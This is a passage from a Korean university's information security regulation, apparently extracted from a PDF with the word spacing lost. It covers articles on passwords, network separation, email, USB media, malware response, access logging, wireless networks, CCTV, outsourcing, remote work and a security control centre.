공개또는열람자료에대해서는부여하지아니할수있다. - 12 -
3 비밀번호는다음각호사항을반영하여숫자와문자, 특수문자등을혼합하여 9자리이상으로정하고, 분기 1회이상주기적으로변경사용하여야한다. 1. 사용자계정 (ID) 과동일하지않은것 2. 개인신상및부서명칭등과관계가없는것 3. 일반사전에등록된단어는사용을피할것 4. 동일단어또는숫자를반복하여사용하지말것 5. 사용된비밀번호는재사용하지말것 6. 동일비밀번호를여러사람이공유하여사용하지말것 7. 응용프로그램등을이용한자동비밀번호입력기능사용금지 4 서버에등록된비밀번호는암호화하여저장하여야한다. 제34조 ( 업무망보안관리 ) 1 대학은업무자료를소통하기위한전산망구축시인터넷과분리하도록망을설계하여야한다. 이경우다음각호의보안대책을강구하여사업계획단계 ( 사업공고전 ) 에서보안심사위원회의보안성검토를의뢰하여야한다. 1. 비인가자의업무망 인터넷침입차단대책 ( 침입차단 탐지시스템등 ) 2. 비인가장비의업무망접속차단대책 ( 네트워크관리시스템등 ) 3. 업무PC 의인터넷접속차단대책 4. 업무망과인터넷간안전한자료전송대책 ( 국가 공공기관업무망과인터넷간안전한자료전송보안가이드라인 (2010.8, 국가정보원 )) 2 대학은제1항에도불구하고, 부득이한경우적정보안대책을강구한후망분리하지아니할수있다. 3 업무망관리자는정보시스템에사용되는 IP주소 를체계적으로관리하여야하며, 업무망을보호하기위하여사설주소체계 (NAT) 를적용하여야한다. 또한, IP주소별로정보시스템접속을통제하여비인가정보통신기기나 PC 등을이용한업무망내정보시스템접속을차단하여야한다. 4 대학은업무망을여타기관의망및인터넷과연결사용하고자할경우에는보안관리책임한계를설정하고망연동에따른보안대책을마련하여자체보안심사위원회에보안성검토를의뢰하여야한다. 5 업무망관리자는제4항과관련하여비인가자의망침입을방지하기위하여안전성이검증된침입차단ㆍ탐지시스템을운용하는등관련보안대책을강구하여야한다. 6 업무망관리자는업무망을인터넷과연동시효율적인보안관리를위하여연결지점을최소화운용하여야한다. 7 정보보안담당관은업무망의외부망연결에따른보안취약성해소를위하여보안도구를이용하여수시점검하여야한다. 제 35 조 ( 네트워크장비보안관리 ) 1 시스템관리자는라우터, 스위치등네트워크장비운용과 - 13 -
관련하여다음각호의보안조치를강구해야한다. 1. 네트워크장비에대한원격접속은원칙적으로금지하되, 불가피할경우장비관리용목적으로내부특정 IPㆍMAC 주소에서의접속은허용 2. 물리적으로안전한장소에설치하여비인가자의무단접근통제 3. 최초설치시보안취약점을점검하여제거하고주기적으로보안패치실시 4. 불필요한서비스포트제거 2 시스템관리자는라우터등중요네트워크장비의접속기록을 6개월이상유지하여야하고비인가자에의한침투여부를주기적으로점검하여정보보안담당관에게관련결과를제출하여야한다. 제36조 ( 전자우편보안대책 ) 1 시스템관리자는웜ㆍ바이러스등악성코드로부터사용자 PC 등전자우편시스템일체를보호하기위하여안전성을확인한백신, 바이러스월, 해킹메일차단시스템을구축하는등보안대책을강구하여야한다 2 사용자는상용전자우편을이용한업무자료송 수신을금지하며기관전자우편으로송 수신한업무자료는열람등활용후메일함에서즉시삭제하여야한다. 3 사용자는메일에포함된첨부파일이자동실행되지않도록설정하고첨부파일다운로드시반드시최신백신으로악성코드은닉여부를검사하여야한다. 4 사용자는출처가불분명하거나의심되는제목의전자우편은열람을금지하고해킹메일로의심되는메일수신시에는즉시정보보안담당자에게신고하여야한다. 5 사용자는전자우편을사용하는 PC에대하여제29조 (PC 등단말기보안관리 ) 및제33조 ( 비밀번호관리 ) 에명시된보안조치사항을따른다. 제37조 ( 휴대용저장매체보안대책 ) 1 휴대용저장매체관리책임자는휴대용저장매체를사용하여업무자료를보관할필요가있을때에는위변조, 훼손, 분실등에대비한보안대책을강구하여정보보안담당관의승인을받아야한다. 2 휴대용저장매체관리책임자는휴대용저장매체를비밀용, 일반용으로구분하고주기적으로수량및보관상태를점검하며반출ㆍ입을통제하여야한다. 3 휴대용저장매체관리책임자는 USB 관리시스템을도입할경우보안심사위원회의보안성검토후도입하여야한다. 4 휴대용저장매체관리책임자는사용자가 USB 메모리를 PC 등에연결시자동실행되지않도록하고최신백신으로악성코드감염여부를자동검사하도록보안설정한다. 5 비밀자료가저장된휴대용저장매체는매체별로비밀등급및관리번호를부여하고비밀관리기록부에등재관리하여야한다. 이경우에는매체전면에비밀등급및관리번호가표시되도록하여야한다. 다만, 휴대용저장매체가국가용보안시스템에해당될경우에는해당보안시스템의운용ㆍ관리체계에따라관리하여야한다. 6 휴대용저장매체를파기등불용처리하거나비밀용을일반용또는다른등급의비밀용으 - 14 -
로전환하여사용할경우저장되어있는정보의복구가불가능하도록완전삭제프로그램을사용하여야한다. 7 정보보안담당관은사용자의휴대용저장매체무단반출및미등록휴대용저장매체사용여부등보안관리실태를주기적으로점검하여야한다. 8 그밖에휴대용저장매체의보안관리에관련한사항은 USB메모리등휴대용저장매체보안관리지침 ( 부록 5) 을따른다. 제38조 ( 악성코드방지대책 ) 1 대학은웜ㆍ바이러스, 해킹프로그램, 스파이웨어등악성코드감염을방지하기위하여다음각호와같은대책을수립ㆍ시행하여야한다. 1. 사용자는개인PC 에서작성하는문서ㆍ데이터베이스작성기등응용프로그램을보안패치하고백신은최신상태로업데이트ㆍ상시감시상태로설정및주기적인점검을실시하여야한다. 2. 사용자는출처, 유통경로및제작자가명확하지않은응용프로그램사용을금지하고인터넷등상용망으로자료입수시신뢰할수있는인터넷사이트를활용하되최신백신으로진단후사용하여야한다. 3. 사용자는인터넷파일공유프로그램과메신저ㆍ대화방프로그램등업무상불필요한프로그램을사용금지하고시스템관리자는인터넷연동구간의침입차단시스템등에서관련사이트접속을차단하도록보안설정하여야한다. 4. 사용자는웹브라우저를통해서명되지않은 (Unsigned) Active-X 등이 PC내에불법다운로드되고실행되지않도록보안설정하여야한다. 5. 제1호부터제4호까지의보안대책과관련하여시스템관리자는정보보안담당관과협조하여사용자가적용할수있는보안기술을지원하여야한다. 2 시스템관리자또는 PC 등의사용자는시스템에악성코드가설치되거나감염된사실을발견하였을경우에다음각호의조치를하여야한다. 1. 악성코드감염원인규명등을위하여파일임의삭제등감염시스템사용을중지하고전산망과의접속을분리한다. 2. 악성코드의감염확산방지를위하여정보보안담당관에게관련사실을즉시통보한다. 3 제2항의조치가완료된후제17조제3항에따라정보보안사고조사권한이정보보안담당관에게위임되었을경우, 정보보안담당관은감염 PC 등에대하여다음각호의조치를하여야한다. 1. 최신백신등악성코드제거프로그램을이용하여악성코드를삭제한다. 2. 감염이심각할경우포맷프로그램을사용하여하드디스크를포맷한다. 3. 악성코드감염의확산및재발을방지하기위하여원인을분석하고예방조치를수행한다. 4 대학은악성코드가신종이거나감염피해가심각하다고판단할경우에는관련사항을교육과학기술부장관에게신속히통보하여야한다. - 15 -
5 대학은교육과학기술부장관이해당기관에악성코드감염사실을확인하여조치를권고할경우, 즉시이행하여야한다. 6 그밖에정보보안사고조사와관련한사항에대해서는제15조 ( 정보보안사고조사 ) 를따른다. 제39조 ( 접근기록관리 ) 1 시스템관리자는정보시스템의효율적인통제ㆍ관리, 사고발생시추적등을위하여사용자의정보시스템접근기록을유지관리하여야한다. 2 제1항의접근기록에는다음각호의내용이포함되어야한다. 1. 접속자, 정보시스템ㆍ응용프로그램등접속대상 2. 로그온ㆍ오프, 파일열람ㆍ출력등작업종류, 작업시간 3. 접속성공ㆍ실패등작업결과 4. 전자우편사용등외부발송정보등 3 시스템관리자는접근기록을분석한결과, 비인가자의접속시도, 정보위변조및무단삭제등의의심스러운활동이나위반혐의가발생한사실을발견한경우정보보안담당관에게즉시보고하여야한다. 4 접근기록은정보보안사고발생시확인등을위하여최소 6개월이상보관하여야하며접근기록위ㆍ변조및외부유출방지대책을강구하여야한다. 제40조 ( 정보시스템개발보안 ) 1 시스템개발사업담당자는정보시스템을자체적으로개발하고자하는경우에는다음각호의사항을고려하여보안대책을수립하고정보보안담당관의승인을득하여야한다. 1. 독립된개발시설을확보하고비인가자의접근통제 2. 개발시스템과운영시스템의물리적분리 3. 소스코드관리및소프트웨어보안관리 2 시스템개발사업담당자는외부용역업체와계약하여정보시스템을개발하고자하는경우에는다음각호의사항을고려하여보안대책을수립하고정보보안담당관의승인을득하여야한다. 1. 외부인력대상신원확인, 보안서약서징구, 보안교육및점검 2. 외부인력의보안준수사항확인및위반시배상책임의계약서명시 3. 외부인력의정보시스템접근권한및제공자료보안대책 4. 외부인력에의한장비반입ㆍ반출및자료무단반출여부확인 5. 제1항의제1호부터제3호까지의사항 3 정보보안담당관은제1항및제2항과관련하여보안대책의적절성을수시로점검하고정보시스템개발을완료한경우에는정보보안요구사항을충족하는지검토하여야한다. 제 41 조 ( 정보시스템유지보수 ) 1 대학은정보시스템유지보수와관련한절차, 주기, 문서화 - 16 -
등에관한사항을자체규정에포함하여야한다. 유지보수절차및문서화수립시고려사항은아래의각호와같다. 1. 유지보수인력에대해보안서약서집행, 보안교육등을포함한유지보수인가절차를마련하고인가된유지보수인력만유지보수에참여한다. 2. 결함이의심되거나발생한결함, 예방및유지보수에대한기록을보관한다. 3. 유지보수를위해원래설치장소외다른장소로정보시스템을이동할경우, 통제수단을강구한다. 4. 정보시스템의유지보수시에는일시, 담당자인적사항, 출입통제조치, 정비내용등을기록ㆍ유지하여야한다. 2 시스템관리자는자체유지보수절차에따라정기적으로정보시스템정비를실시하고관련기록을보관하여야한다. 3 시스템관리자는정보시스템의변경이발생할경우, 정보보안담당관과협조하여정보시스템의설계ㆍ코딩ㆍ테스트ㆍ구현과정에서의보안대책을강구하며정보보안담당관은관련적절성을주기적으로확인하여야한다. 4 정보보안담당관은시스템관리자등이유지보수와관련된장비ㆍ도구등을반출입할경우, 악성코드감염여부, 자료무단반출여부를확인하는등보안조치하여야한다. 5 시스템관리자는외부에서원격으로정보시스템을유지보수하는것을원칙적으로금지하여야하며부득이한경우에는정보보안담당관과협의하여자체보안대책을강구한후한시적으로허용할수있다. 제42조 ( 전자정보저장매체불용처리 ) 1 사용자및시스템관리자는하드디스크등전자정보저장매체를불용처리 ( 교체ㆍ반납ㆍ양여ㆍ폐기등 ) 하고자할경우에는정보보안담당관의승인하에저장매체에수록된자료가유출되지않도록보안조치하여야한다. 2 자료의삭제는해당정보가복구될수없도록해당기관실정에맞게저장매체별, 자료별차별화된삭제방법을적용하여야한다. 3 대학내에서정보시스템의사용자가변경된경우, 비밀처리용정보시스템은완전포맷 3회이상, 그외의정보시스템은완전포맷 1회이상으로저장자료를삭제하여야한다. 4 전자정보저장매체의불용처리에관한구체적인사항은 정보시스템저장매체불용처리지침 ( 부록 6) 을따른다. 제4절주요상황별보안대책제43조 ( 전자기파보안대책 ) 1 대학은중요정보통신시스템및정보통신시설등으로부터발생되는누설전자기파를이용한정보유출을방지하기위해다음각호의사항을포함한보안대책을강구하여야한다. 1. 정보통신시설이보관된사무실에차폐필름, 도료, 차폐벽지등부착 - 17 -
2. 안전성이검증된 PC 전자기파차폐장비설치또는전자기파차폐실운용 2 대학은전기ㆍ전력ㆍ정보통신시스템및시설을대상으로고출력전자기파 (EMP) 에대한침해방지대책을수립ㆍ시행하여야한다. 3 대학은제1항및제2항에따른대책강구시에는 전자기파차폐실구축및측정기준 (2005.1, 국가정보원 ) 을준수하여야한다. 제44조 ( 무선랜보안관리 ) 1 대학은무선랜 (Wifi 등 ) 을사용하여업무자료를소통하고자할경우자체보안대책을수립하여관련사업계획단계 ( 사업공고전 ) 에서보안심사위원회에보안성검토를의뢰하여야한다. 2 시스템관리자는제1항의보안대책수립시, 다음각호의사항을포함하여야한다. 1. 네트워크이름 (SSID, Service Set Identifier) 브로드캐스팅중지 2. 추측이어려운복잡한 SSID 사용 3. WPA2 이상 (256비트이상 ) 의암호체계를사용하여소통자료암호화 ( 국가정보원장이승인한암호논리사용 ) 4. MAC 주소및 IP 필터링설정, DHCP 사용금지 5. RADIUS(Remote Authentication Dial-In User Service) 인증사용 6. 그밖에무선단말기ㆍ중계기 (AP) 등무선랜구성요소별분실ㆍ탈취ㆍ훼손ㆍ오용등에대비한관리적ㆍ물리적보안대책 3 정보보안담당관은제1항및제2항과관련한보안대책의적절성을수시로점검하고보완하여야한다. 제45조 ( 국제통신보안관리 ) 1 대학은국제전화ㆍ인터넷ㆍ팩스등국제통신망을이용하여비밀등중요자료를소통하고자하는경우에는다음각호를포함한보안대책을강구하고사전에보안심사위원회에보안성검토를의뢰하여야한다. 1. 국가정보원장이개발하거나안전성을검증한암호장비ㆍ보안자재ㆍ암호논리ㆍ암호모듈ㆍ정보보호시스템의도입운용 2. 국가정보원장이안전성을확인한정보통신망보안대책의시행 2 대학은국제통신망으로업무와관련된사항을송수신하고자할경우에는사전에자료및소통내용에대한보안통제를실시하여야한다. 제46조 ( 국제회의보안관리 ) 1 대학은국제협상등중요국제회의를위하여노트북, PC 등의정보시스템을해외현지에서사용하고자하는경우회의정보가유출되지않도록다음각호의보안대책을수립ㆍ시행하여야한다. 1. 정보시스템설치장소에대한물리적접근통제대책 2. 정보시스템접근통제및분실방지등보안관리대책 3. 암호화등정보시스템저장정보보안대책 - 18 -
4. 전화 팩스등통신시설에대한도청방지대책 5. 그밖에회의정보보호를위하여필요하다고인정되는대책 2 대학은제1항의보안대책을수립한경우적절성을확인하기위하여사전에보안심사위원회에보안성검토를의뢰할수있다. 3 국제회의참가자는회의대상국이제공한정보시스템을이용하여중요회의정보를작성하거나저장또는송 수신하여서는아니된다. 다만불가피한경우에는보안대책을수립한후그러하지아니할수있다. 4 국제회의참가자는회의대상국이제공한 USB메모리등휴대용저장매체를사용하여서는아니된다. 다만, 불가피할경우에는최신백신으로악성코드감염여부를확인하는등보안조치후사용토록하여야한다. 제47조 ( 무선인터넷보안관리 ) 1 대학은무선인터넷 (WiBro, HSDPA 등 ) 시스템을구축하여업무자료를소통하고자할경우자체보안대책을수립하여관련사업계획단계 ( 사업공고전 ) 에서보안심사위원회에보안성검토를의뢰하여야한다. 2 시스템관리자는청사전역에무선인터넷사용을제한하고민원실등특별히무선인터넷사용이필요한구역에한해기관장책임하에운용한다. 3 시스템관리자는업무용PC 에서무선인터넷접속장치 (USB형등 ) 가작동되지않도록관련프로그램설치금지등기술적보안대책을강구하여야한다. 4 정보보안담당관은개인휴대폰을제외한무선인터넷단말기의사무실무단반입ㆍ사용을금지하는한편제1항부터제3항까지와관련한보안대책의적절성을수시로점검하고보완하여야한다. 제48조 (RFID 보안관리 ) 1 대학은 RFID 시스템을구축하여중요자료등보호할필요가있는정보를소통하고자할경우자체보안대책을수립하여사업계획단계 ( 사업공고전 ) 에서보안심사위원회에보안성검토를의뢰하여야한다. 2 시스템관리자는제1항의보안대책수립시, 다음각호의사항을포함하여야한다. 1. RFID시스템의분실ㆍ탈취대비보안대책및백업대책 2. 태그정보의최소화대책 3. 장치인증, 사용자인증및기밀등중요정보의암호화대책 3 정보보안담당관은제1항및제2항과관련한보안대책의적절성을수시로점검하고보완하여야한다. 4 RFID 보안관리에관한구체적인사항은 RFID 보안관리지침 ( 부록 8) 을따른다. 제 49 조 ( 인터넷전화보안관리 ) 1 대학은인터넷전화시스템을구축하거나민간인터넷전화사 업자망 (070) 을사용하고자할경우에는사업계획단계에서자체보안대책을수립시행하여 야한다. - 19 -
2 시스템관리자는제1항의보안대책수립시, 다음각호의사항을포함하여야한다. 1. 인터넷전화기에대한장치인증및사용자인증 2. 제어신호및통화내용의암호화 3. 인터넷전화망 ( 음성네트워크 ) 과일반전산망 ( 데이터네트워크 ) 의분리 4. 인터넷전화전용방화벽등정보보호시스템 5. 백업체제구축 3 시스템관리자는인터넷전화시스템구축을위해민간사업자망을이용할경우, 해당사업자로하여금서비스제공구간에대한보안대책을강구하도록하여야한다. 4 인터넷전화구축시보안관리에관련된구체적인사항은 인터넷전화구축시보안준수사항 ( 부록 9) 을따른다. 제50조 (CCTV운용보안관리 ) 1 대학은 CCTV 운용에필요한카메라, 중계ㆍ관제서버, 관리용PC 등관련시스템을비인가자의임의조작이물리적으로불가능하도록설치하여야한다. 2 CCTV 상황실은보호구역으로지정관리하고출입통제장치를도입하여야한다. 3 시스템관리자는 CCTV 카메라, 비디오서버, 관제서버및관련전산망설치시업무망및인터넷과분리운영하는것을원칙으로한다. 다만, 부득이하게인터넷망을이용할경우에는전송내용을암호화하여야한다. 4 CCTV 시스템일체는사용자계정ㆍ비밀번호등시스템인증대책을강구하고허용된특정 IP에서만접속허용하는등비인가자의침입통제대책을강구하여야한다. 5 정보보안담당관은제1항부터제4항까지와관련하여보안대책의적절성을수시로점검하고보완하여야한다. 6 CCTV 시스템의보안관리에관련된구체적인사항은 CCTV 시스템보안관리방안 ( 부록 10) 을따른다. 제51조 ( 디지털복사기보안관리 ) 1 대학은디지털복사기 ( 이하 복사기 라한다 ) 를도입하고자할경우복사기내저장매체에보관된자료유출방지를위해자료의완전삭제기능이탑재된제품을도입하여야한다. 2 시스템관리자는다음각호의경우에복사기저장매체의저장자료를완전삭제하여야한다. 1. 복사기의사용연한이경과하여폐기ㆍ양여할경우 2. 복사기의무상보증기간중저장매체또는복사기전체를교체할경우 3. 고장수리를위한외부반출등당해기관이복사기의저장매체를보안통제할수없는환경으로이동할경우 4. 그밖에대학에서저장자료삭제가필요하다고판단하는경우 3 시스템관리자는복사기의소모품등을교체하기위한유지보수시정보보안담당자입회ㆍ감 - 20 -
독하에작업을실시하여저장매체무단교체등을예방하여야한다. 4 정보보안담당관은해기관의저장매체내장복사기현황을파악하고복사기의유지보수및불용처리시저장매체에대한보안조치를수행하여야한다. 5 복사기의저장자료삭제방법등에관련한구체적인사항은 정보시스템저장매체불용처리방안 ( 부록 6) 을따른다. 제52조 ( 첨단정보통신기기보안관리 ) 1 대학은개인휴대단말기 (PDA) ㆍ스마트폰, 전자제어장비등첨단정보통신기기를활용하여업무자료등중요정보를소통ㆍ관리하고자할경우에는자체보안대책을수립하여관련사업계획단계 ( 사업공고전 ) 에서보안심사위원회에보안성검토를의뢰하여야한다. 2 시스템관리자는제1항의보안대책수립시, 다음각호의사항을포함하여야한다. 1. 첨단정보통신기기에대한장치인증및사용자인증 2. 제어신호, 통화내용등데이터의암호화 3. 업무자료의무단저장금지및업무용ㆍ인터넷 PC에무단연동금지 4. 시스템의분실ㆍ훼손ㆍ탈취등에대비한관리적ㆍ물리적ㆍ기술적보안대책 3 정보보안담당관은개인이소지한첨단정보통신기기가업무와무관하더라도업무자료유출에직ㆍ간접악용될소지가있다고판단될경우, 반ㆍ출입통제등관련대책을강구할수있다. 4 대학은제2항과관련한대책수립ㆍ시행을위해교육과학기술부장관에게해당첨단정보통신기기도입에따른보안취약점과대책등기술지원을요청할수있다. 5 대학은제2항과관련, 정보통신기기사용자를대상으로인증및암호화에필요한전자정보를발급할수없는경우, 정보통신기기암호기술적용지침 (2010.8, 국가정보원 ) 을준수하여야한다. 6 대학은스마트폰을업무에안전하게활용하고자할경우, 보안요구사항을명시한 국가기관업무용스마트폰보안규격 (2010.6, 국가정보원 ) 을준수하여야한다. 제53조 ( 정보통신망자료보안관리 ) 1 대학은다음각호에해당하는정보통신망관련현황ㆍ자료관리에유의하여야한다. 1. 정보시스템운용현황 2. 정보통신망구성현황 3. IP 할당현황 4. 주요정보화사업추진현황 2 대학은다음각호의자료를대외비로분류하여관리하여야한다. 다만, 국가안보와직결되는중요한정보통신망관련세부자료는해당등급의비밀로분류관리하여야한다. 1. 정보통신망세부구성현황 (IP 세부할당현황포함 ) 2. 국가용보안시스템운용현황 - 21 -
3. 보안취약점분석ㆍ평가결과물 4. 그밖에보호할필요가있는정보통신망관련자료 3 제2항에명시되지않은정보통신망관련대외비및비밀의분류는국가정보원장이제정한 비밀세부분류지침 ( 대외비 ) 을따른다. 제54조 ( 용역사업보안관리 ) 1 대학은정보화ㆍ정보보호사업및보안컨설팅수행등을외부용역으로추진할경우사업책임자로하여금다음각호의사항을포함한보안대책을수립 시행하여야한다. 1. 용역사업계약시계약서에참가직원의보안준수사항과위반시손해배상책임등명시 2. 용역사업수행관련보안교육ㆍ점검및용역기간중참여인력임의교체금지 3. 정보통신망도ㆍ IP현황등용역업체에제공할자료는자료인계인수대장을비치, 보안조치후인계ㆍ인수하고무단복사및외부반출금지 4. 사업종료시외부업체의노트북ㆍ휴대용저장매체등을통해비공개자료가유출되는것을방지하기위해복구가불가능하도록완전삭제 5. 용역업체로부터용역결과물을전량회수하고비인가자에게제공ㆍ열람금지 6. 용역업체의노트북등관련장비를반입ㆍ반출시마다악성코드감염여부, 자료무단반출여부를확인 7. 그밖에대학이보안관리가필요하다고판단하는사항이나교육과학기술부장관이보안조치를권고하는사항 2 대학은 국가계약법 시행령제76조제1항제18호에따라용역사업추진시과업지시서ㆍ입찰공고ㆍ계약서에다음각호의누출금지대상정보를명시해야하며해당정보누출시입찰참가자격제한을위한부정당업자로등록하여야한다. 1. 기관소유정보시스템의내ㆍ외부 IP주소현황 2. 세부정보시스템구성현황및정보통신망구성도 3. 사용자계정ㆍ비밀번호등정보시스템접근권한정보 4. 정보통신망취약점분석ㆍ평가결과물 5. 정보화용역사업결과물및관련프로그램소스코드 ( 유출시안보ㆍ국익에피해가우려되는중요용역사업에해당 ) 6. 국가용보안시스템및정보보호시스템도입현황 7. 침입차단시스템ㆍ방지시스템 (IPS) 등정보보호제품및라우터ㆍ스위치등네트워크장비설정정보 8. 공공기관의정보공개에관한법률 제 9조제1항에따라비공개대상정보로분류된기관의내부문서 9. 공공기관의개인정보보호에관한법률 제2 조제2호의개인정보 10. 보안업무규정 제 4조의비밀및동시행규칙제7조제3항의대외비 - 22 -
11. 그밖에대학이공개가불가하다고판단한자료 3 대학은비밀관련용역사업을수행할경우, 외부인원에대한신원조사ㆍ비밀취급인가, 보안교육등보안조치를수행하여야한다. 4 정보보안담당관은제1항내지제3항에서규정한보안대책의시행과관련한이행실태를주기적으로점검하고미비점발견시사업책임자로하여금보완토록조치하여야한다. 5 그밖의사항에대하여는 외부용역업체보안관리방안 ( 부록 7) 을참조한다. 제55조 ( 정보시스템위탁운영보안관리 ) 1 대학은소관정보시스템에대한외부업체의위탁운영을최소화하되, 위탁운영과관련한관리적ㆍ물리적ㆍ기술적보안대책을수립하여시행하여야한다. 2 정보시스템의위탁운영은여타기관또는업체직원이당해기관에상주하여수행하는것을원칙으로한다. 다만, 해당기관에위탁업무수행직원의상주가불가한타당한사유가있을경우, 그러하지아니할수있다. 3 정보시스템의위탁운영과관련하여동조문에명시되지않은사항에대해서는제58조 ( 용역사업보안관리 ) 등을준용한다. 제56조 ( 원격근무보안관리 ) 1 대학은재택ㆍ파견ㆍ이동근무등원격근무를지원하기위한정보시스템을도입ㆍ운영할경우기술적ㆍ관리적ㆍ물리적보안대책을수립하고보안심사위원회의보안성검토를거쳐시행하여야한다. 2 대학은원격근무가능업무및공개ㆍ비공개업무선정기준을수립하되대외비이상비밀자료를취급하는업무는원격근무대상에서원칙적으로제외하되반드시수행해야하는경우보안담당관과협의하여수행여부를결정한다. 3 대학은모든원격근무자에게별표 5-3의보안서약서를징구하고원격근무자의업무변경ㆍ인사이동ㆍ퇴직등상황발생시정보시스템접근권한재설정등관련절차를수립하여야한다. 4 원격근무자는원격근무시해킹에의한업무자료유출을방지하기위하여작업수행전백신으로원격근무용 PC 점검 업무자료저장금지등보안조치를수행하여야한다. 5 원격근무자는정보시스템고장시정보유출방지등보안대책을강구한후정보보안담당관과협의하여정비ㆍ반납등조치를취하여야한다. 6 비공개원격업무인경우에는국가용보안시스템을사용하여소통자료를암호화하고행정전자서명체계를이용하여인증하며인증강화를위해일회용비밀번호ㆍ생체인증등보안기술을사용하여야한다. 7 정보보안담당관은주기적인보안점검을실시하여원격근무보안대책의이행여부를확인하여야한다. 제 57 조 ( 국가비상사태시보호관리 ) 1 대학은전시ㆍ사변또는이에준하는국가비상사태발 - 23 -
생시에비밀및중요정보시스템의효율적인보호관리를위한대책을강구하여야한다. 2 제1항의비밀및중요정보시스템에는다음각호의사항을포함한다. 1. 국가비상사태발생시후송하여계속보관해야할비밀 (A급비밀 ) 2. 암호장비, 음어자재, 비밀관리시스템등국가용보안시스템 3. 비밀이저장된 CDㆍ외장형하드디스크ㆍ USB메모리등휴대용저장매체 4. 대학이보관이필요하다고결정한중요자료및중요정보시스템등 3 대학은제1항의보호관리대책수립시충무사태단계별비밀및중요정보시스템의소산ㆍ이동ㆍ파기절차ㆍ방법등조치방안일체를포함하여야한다. 4 대학은비상사태에따른소관업무지역이동시비밀을정보통신망을통하여유통ㆍ관리하고자할경우에는국가지도통신망등국가정보원장이안전성을확인한보안조치를하여야한다. 5 비상사태시비밀문서의보안관리에관한기타사항은 국가비상사태시비밀관리지침 ( 국가정보원 ) 을따른다. 제5절주요정보통신기반시설등의보안대책제58조 ( 주요정보통신기반기설보안대책 ) 1 대학은 정보통신기반보호법 및같은법시행령에따라주요정보통신기반시설 ( 이하 주요기반시설 이라한다 ) 에대한보호대책을수립ㆍ시행하여야한다. 2 대학은제1항의보호대책을수립하는경우에다음각호의사항이포함되도록하고, 전년도추진실적평가및문제점에대한개선사항을익년도보호대책에반영하여야한다. 1. 소관주요기반시설현황및보호목적 2. 전년도보호업무추진실적및당해연도추진계획 3. 보안취약점분석ㆍ평가결과및도출된문제점에대한개선사항 4. 침해사고발생시대응및복구대책 5. 전자적침해행위예방을위한관리적ㆍ물리적ㆍ기술적보안대책등 제59조 ( 주요기반시설지정 ) 1 대학은소관정보통신망에대하여주요기반시설지정을추진할경우에 정보통신기반보호법 제 8조의규정에의한기반시설지정기준에부합하는지여부를검토하여야한다. 2 보안담당관은효율적인정보보안업무수행을위하여필요하다고판단되는경우에는총장에게소관에대하여그지정또는해지를권고할수있다. 3 국가정보원장은주요기반시설지정업무에활용할수있도록공공분야주요기반시설에대한지정평가기준 ( 안 ) 을마련하여대학에게통보할수있다. 제 60 조 ( 주요기반시설취약점분석ㆍ평가보안관리 ) 1 주요기반시설을관리하는부서 ( 이하 관리부서 이라한다 ) 의장은지식정보보안컨설팅전문업체등외부기관에소관기반시설의 - 24 -
취약점분석ㆍ평가를의뢰하고자하는경우에는자료유출방지등을위한보안대책을수립하여야한다. 2 관리부서의장은외부기관에의뢰하여취약점분석ㆍ평가를완료하였을경우에는외부기관이제출한평가결과 ( 취약점및관련보호대책을포함한다 ) 에대한적절성을검증하여야한다. 단, 관리부서의장이필요하다고판단되는경우보안심사위원회에적절성검증을의뢰할수있다. 3 관리부서의장은취약점분석ㆍ평가세부결과를그중요성과가치의정도에따라대외비또는비밀로지정관리하고인터넷이나학회지등외부에공개또는발표하여서는아니된다. 다만, 정보보안기술교류나학문적연구등을목적으로하는비공개회의등의경우에는자체보안성검토를거친후발표할수있다. 4 관리부서의장은취약점분석ㆍ평가의효율적수행을위하여보안심사위원회에평가방향, 평가중점사항, 평가결과적절성검증, 평가업체보안점검등의지원을요청할수있다. 제61조 ( 제어시스템보안관리 ) 1 대학은중앙에서감시및제어하기위한정보시스템 ( 이하 제어시스템 이라한다 ) 을구축할경우보안대책을수립하고보안담당관을경유하여보안심사위원회에보안성검토를요청하여야한다. 2 시스템관리자는제어시스템도입ㆍ교체시최신백신설치, 응용프로그램보안패치및침해사고대응책을마련하고주기적으로취약점을점검하여야한다. 3 대학은중요한제어시스템구축시해당시스템을내부업무망및인터넷망등상용망과분리운용한다. 4 제3항에도불구하고제어시스템을업무망과상용망간연동이필요할경우에는보안심사위원회의사전승인절차를거쳐연동구간에일방향통신장비설치등안전한망연동기법을적용하여야한다. 제 4 장보안관제 제62조 ( 보안관제센터구축 ) 1 대학은소관정보통신망에대한사이버공격정보를수집ㆍ분석ㆍ대응할수있는보안관제센터를설치하여야한다. 다만국가ㆍ공공기관이운영하는보안관제센터에관련업무를위탁할수있다. 2 보안관제센터를운영하는기관의장은보안관제업무를하루 24시간중단없이수행하여야하며보안관제센터운영에필요한전담직원을배치하여야한다. 3 대학은사이버공격정보를수집할경우, 피해유무를파악하고공격 IP차단, 로그자료보존등초동조치를신속하게취하여야한다. 이경우, 사고원인규명시까지피해시스템에대한증거를보전하고임의로관련자료를삭제하거나포맷하여서는아니된다. - 25 -
4 대학은초동조치가끝난경우에교육과학기술부장관과협의하여보안대책을수립ㆍ시행하여야한다. 5 대학은사이버공격정보의신속한수집및전파를위하여교육과학기술부장관등과비상연락체계를구축하여야한다. 제63조 ( 정보공유 ) 1 대학은관계법규에위배되지않는범위내에서수집ㆍ탐지한사이버공격정보를교육과학기술부장관, 및시 도교육감및국가정보원장에게제공하여야한다. 2 보안관제센터를운영하는기관의장은별지제8호서식에따라보안관제센터의운영현황을작성하여교육과학기술부장관에게통보하여야한다. 다만, 기제출한경우에는변동사항에한하여통보한다. 3 보안관제센터를운영하는기관의장은보안관제시수집된사이버공격정보가여타보안관제센터의소관업무와연관될경우에해당보안관제센터의장에게별지제9호서식에따라신속히이관하여야한다. 4 교육과학기술부장관은제1항내지제3항의규정에따른사이버공격정보를전자적으로공유하기위해보안대책이강구된통합보안관제정보공유시스템을구축ㆍ운영할수있으며, 대학은특별한사정이없는한동시스템을활용하여야한다. 제64조 ( 보안관제용역업체선정 ) 1 대학은지식경제부장관이지정하는보안관제전문업체중에서 보안관제용역업체업무수행능력평가기준 등을참고하여보안관제용역업체를선정한다. 2 보안관제용역업체선정을위해작성한각종문서는평가가끝난후에도공개할수없으며 3년간보존하여야한다. 다만관계법규에의해의한정보공개를요청받은경우에는그러하지아니할수있다. 제 5 장안전성확인 제 1 절보안성검토 제65조 ( 보안성검토신청 ) 1 대학은다음각호의정보화사업을추진할경우에대하여자체보안대책을강구하고안전성을확인하기위하여사업계획단계 ( 사업공고전 ) 에서보안담당관을경유하여보안심사위원회에보안성검토를의뢰하여야한다. 1. 비밀등중요자료의생산, 등록, 보관, 사용, 유통및재분류, 이관, 